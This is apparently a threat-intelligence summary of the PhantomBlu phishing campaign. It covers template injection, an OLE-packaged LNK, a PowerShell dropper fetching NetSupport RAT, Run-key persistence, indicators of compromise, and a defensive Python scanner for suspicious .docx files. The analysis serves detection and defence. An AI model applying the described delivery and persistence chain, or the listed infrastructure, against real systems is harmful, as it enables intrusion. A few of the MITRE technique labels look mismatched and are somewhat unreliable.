Keypoints
- PhantomBlu is a phishing campaign targeting US organizations that delivers NetSupport RAT via a malicious .docx attachment.
- Attackers use OLE template manipulation / Template Injection (T1221) to hide the payload outside the document and trigger it on user interaction.
- The document contains an embedded OLE package (clickable printer image) that extracts a ZIP containing a malicious LNK file.
- The LNK executes an obfuscated PowerShell dropper that retrieves a secondary ZIP, unpacks it, and runs the NetSupport binary (Client32.exe).
- Persistence is achieved by creating a Run registry key under HKCU:\Software\Microsoft\Windows\CurrentVersion\Run.
- Payload delivery is user-agent gated and highly obfuscated; investigators used recursive unpacking to fully deconstruct the chain.
- Configuration files inside the NetSupport binary revealed command-and-control servers used for remote control.
MITRE Techniques
- [T1221] Template Injection – OLE template manipulation was used to hide the payload outside the document and execute it on interaction; quote: ‘OLE template manipulation (Defense Evasion – T1221)’.
- [T1219] Remote Access Software – NetSupport RAT was deployed to provide remote control and surveillance; quote: ‘NetSupport RAT is a spin-off of the legitimate NetSupport Manager, a remote technical support app’.
- [T1047] Windows Management Instrumentation – Listed among campaign TTPs in the report; quote: ‘Windows Management Instrumentation(T1047) — https://attack.mitre.org/techniques/T1047/’.
- [T1564/003] Hide Artifacts: Hidden Files and Directories / Hidden Window – The campaign hides components within archives and uses template embedding to conceal payloads; quote: ‘Hide Artifacts: Hidden Files and Directories(T1564/003) — https://attack.mitre.org/techniques/T1564/003/’.
- [T1547/001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Persistence via creating a Run key in HKCU; quote: ‘Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder(T1547/001)’.
- [T1112] Modify Registry – The dropper creates registry entries to maintain persistence; quote: ‘Modify Registry(T1112) — https://attack.mitre.org/techniques/T1112/’.
- [T1406/002] Obfuscated Files or Information: Software Packing – Attackers used obfuscated PowerShell and packed artifacts to evade detection; quote: ‘Obfuscated Files or Information: Software Packing(T1406/002) — https://attack.mitre.org/techniques/T1406/002/’.
- [T1049] System Network Connections Discovery – NetSupport configuration contained C2 server addresses used for remote connections; quote: ‘System Network Connections Discovery(T1049) — https://attack.mitre.org/techniques/T1049/’.
Indicators of Compromise
- [Hashes (SHA-256)] Malicious artifacts – examples: Client32.exe 89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1, Docx 1abf56bc5fbf84805ed0fbf28e7f986c7bb2833972793252f3e358b13b638bb1, and 4 more hashes.
- [URLs / Hostnames] Payload hosting and staging – examples: yourownmart[.]com/solar[.]txt, firstieragency[.]com/depbrndksokkkdkxoqnazneifidmyyjdpji[.]txt, and other hostnames used for delivery.
- [IP Addresses] C2 or hosting infrastructure – examples: 192[.]236[.]192[.]48, 173[.]252[.]167[.]50, and other IPs observed.
- [Email artefacts] Delivery service identifiers – Message ID/Return Path evidence of SendInBlue/Brevo use: ‘sendinblue.com’, ‘sender-sib.com’.
PhantomBlu begins with targeted phishing emails that carry a password-protected .docx and instructions to enable editing; the visible “printer” image inside the document is an embedded OLE package that, when activated, extracts a ZIP containing a single LNK file. The campaign leverages OLE template manipulation (T1221) to keep the malicious content outside the document body, forcing user interaction to trigger the next stage and evading inline-document detection.
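As an added example (not tooling from the report or from any vendor), the following Python check flags the two document-level delivery tricks discussed above: an embedded object under word/embeddings/ such as the clickable printer OLE package, and, going slightly beyond this page, an attachedTemplate relationship that points outside the package, which is the usual form of T1221. The minimal .docx it builds is constructed for the test and is not a real PhantomBlu document; the hostname example.invalid is a placeholder.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Locations inside a .docx (an OOXML zip) where the delivery tricks surface.
EMBEDDINGS_PREFIX = "word/embeddings/"           # embedded objects such as OLE packages
SETTINGS_RELS = "word/_rels/settings.xml.rels"   # holds the attachedTemplate relationship
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def scan_docx(data: bytes) -> dict:
    """Return embedded object paths and external template targets found in a .docx blob."""
    findings = {"embedded_ole": [], "external_templates": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        # Any entry under word/embeddings/ is an embedded object (the lure's printer icon was one).
        findings["embedded_ole"] = [n for n in names if n.startswith(EMBEDDINGS_PREFIX)]
        if SETTINGS_RELS in names:
            root = ET.fromstring(zf.read(SETTINGS_RELS))
            for rel in root.iter(REL_NS + "Relationship"):
                # A template fetched from outside the package is the classic T1221 shape.
                if rel.get("Type", "").endswith("/attachedTemplate") and rel.get("TargetMode") == "External":
                    findings["external_templates"].append(rel.get("Target", ""))
    return findings


def is_suspicious(findings: dict) -> bool:
    """Either finding alone is enough to route the attachment for sandboxing or analyst review."""
    return bool(findings["embedded_ole"] or findings["external_templates"])


def build_sample_docx(malicious: bool = True) -> bytes:
    """Constructed minimal .docx for testing (not a real PhantomBlu sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if malicious:
            # Fake OLE package standing in for the clickable "printer" object.
            zf.writestr("word/embeddings/oleObject1.bin", b"\xd0\xcf\x11\xe0 constructed")
            zf.writestr(SETTINGS_RELS,
                '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
                '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
                'relationships/attachedTemplate" Target="http://example.invalid/t.dotm" '
                'TargetMode="External"/></Relationships>')
    return buf.getvalue()
```

Run `scan_docx` over attachments at the mail gateway and treat a non-empty result as a reason to hold the message; a benign document yields two empty lists.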
The LNK acts as a launcher for an obfuscated PowerShell dropper that fetches a staged URL (user-agent gated), downloads a secondary ZIP, and unpacks it into a working directory. De-obfuscated PowerShell shows that it downloads and unzips the payload, then executes the secondary script to deploy Client32.exe (NetSupport RAT) and writes a persistence entry under HKCU:\Software\Microsoft\Windows\CurrentVersion\Run. The dropper also contains registry-modification routines and evidence-removal steps that defenders observed when deconstructing the chain.
Analysis of the extracted NetSupport binary and its configuration files exposed command-and-control hostnames and IPs used for remote access. The adversary combined packing/obfuscation, user-agent gated delivery, and template injection to complicate detection; defenders decompressed the layers using recursive unpacking to reveal the LNK/PowerShell stages, final executable, and registry persistence indicators documented above.